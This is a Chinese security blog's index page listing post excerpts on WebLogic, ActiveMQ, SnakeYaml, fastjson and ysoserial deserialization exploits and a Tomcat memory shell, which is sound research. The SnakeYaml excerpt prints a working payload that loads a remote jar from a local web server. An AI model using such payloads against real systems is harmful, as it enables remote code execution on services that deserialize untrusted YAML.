会员
周边
新闻
博问
AI培训
云市场
所有博客
当前博客
我的博客
我的园子
账号设置
简洁模式
...
退出登录
注册
登录
功夫小熊猫
博客园
首页
新随笔
联系
订阅
管理
2024年2月21日
weblogic CVE-2024-20931分析
摘要: weblogic 12.2.1.4.0安装 我的环境:ubuntu 22.04 + weblogic 12.2.1.4.0 + jdk8(注:weblogic不支持OpenJDK) jdk下载安装:https://www.oracle.com/cn/java/technologies/downloa
阅读全文
posted @ 2024-02-21 19:07 功夫小熊猫
阅读(480)
评论(0)
推荐(0)
编辑
2024年1月9日
ActiveMQ RCE CVE-2023-46604分析
摘要: 一、漏洞触发点 org.apache.activemq.openwire.v12包下BaseDataStreamMarshaller类的createThrowable方法。 package org.apache.activemq.openwire.v12; BaseDataStreamMarshal
阅读全文
posted @ 2024-01-09 22:23 功夫小熊猫
阅读(179)
评论(0)
推荐(0)
编辑
2023年8月29日
银河麒麟V10 SP2 auditd服务内存泄露问题
摘要: 这几天遇到基于海光服务器的银河麒麟V10 SP2版本操作系统出现内存无故增长问题。 排查发现auditd服务,占用了大量内存。 我的环境是银河麒麟V10 SP2 524,audit版本audit-3.0-5.se.06 ==5037== HEAP SUMMARY: ==5037== in use a
阅读全文
posted @ 2023-08-29 08:49 功夫小熊猫
阅读(2652)
评论(0)
推荐(4)
编辑
2023年7月4日
tomcat Filter内存马
摘要: idea调试的时候加入源代码 ```markdown org.apache.tomcat tomcat-catalina 8.5.81 provided ``` Servlet、Listener、Filter 由 `javax.servlet.ServletContext` 去加载,无论是使用 xm
阅读全文
posted @ 2023-07-04 22:50 功夫小熊猫
阅读(137)
评论(0)
推荐(0)
编辑
2023年2月25日
SnakeYaml的不出网反序列化利用分析
摘要: SnakeYaml的常见出网利用方式: !!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[ !!java.net.URL ["http://127.0.0.1:9000/yaml-payload.jar"] ]] ] 不
阅读全文
posted @ 2023-02-25 23:37 功夫小熊猫
阅读(313)
评论(0)
推荐(2)
编辑
2022年12月31日
fastjson反序列化各版本利用汇总
摘要:
阅读全文
posted @ 2022-12-31 20:01 功夫小熊猫
阅读(54)
评论(0)
推荐(0)
编辑
2022年11月2日
ysoserial CommonsCollections2 分析
摘要: 在最后一步的实现上,cc2和cc3一样,最终都是通过TemplatesImpl恶意字节码文件动态加载方式实现反序列化。 已知的TemplatesImpl->newTransformer()是最终要执行的。 TemplatesImpl类动态加载方式的实现分析见ysoserial CommonsColl
阅读全文
posted @ 2022-11-02 21:38 功夫小熊猫
阅读(261)
评论(0)
推荐(0)
编辑
2022年10月28日
ysoserial CommonsCollections3 分析
摘要:
cc3利用链如下: TrAXFilter(Templates templates) TemplatesImpl->newTransformer() TemplatesImpl->getTransletInstance() _class[_transletIndex].newInstance(); 一
阅读全文
posted @ 2022-10-28 13:25 功夫小熊猫
阅读(210)
评论(0)
推荐(0)
编辑
2022年10月13日
ysoserial CommonsCollections6 分析
摘要: 利用链如下: 其中LazyMap.get()->ChainedTransformer.transform()-InvokerTransformer.transform()与CC1链一致。 /* Gadget chain: java.io.ObjectInputStream.readObject()
阅读全文
posted @ 2022-10-13 20:37 功夫小熊猫
阅读(301)
评论(0)
推荐(0)
编辑
2022年10月5日
ysoserial CommonsCollections1 分析
摘要: /* Gadget chain: ObjectInputStream.readObject() AnnotationInvocationHandler.readObject() Map(Proxy).entrySet() AnnotationInvocationHandler.invoke() La
阅读全文
posted @ 2022-10-05 22:16 功夫小熊猫
阅读(125)
评论(0)
推荐(0)
编辑
下一页